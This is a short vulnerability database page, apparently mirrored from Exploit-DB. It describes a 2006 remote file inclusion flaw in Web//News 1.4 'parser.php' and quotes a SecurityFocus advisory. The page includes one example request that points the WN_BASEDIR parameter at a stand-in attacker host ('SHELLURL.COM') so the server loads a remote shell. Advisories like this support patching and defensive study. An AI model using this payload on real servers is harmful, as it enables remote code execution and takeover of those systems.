https://www.exploit-db.com/exploits/28720
Web//News 1.4 - 'parser.php' Remote File Inclusion (2)






漏洞ID | 1055949 | 漏洞类型 | |
发布时间 | 2006-09-27 | 更新时间 | 2006-09-27 |
![]() |
N/A | ![]() |
N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/20239/info
Web//News is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Web//News 1.4 and prior versions are vulnerable; other versions may also be affected.
htpp://www.example.com[scerpitPath]/parse/parser.php?WN_BASEDIR=http://SHELLURL.COM
检索漏洞
开始时间
结束时间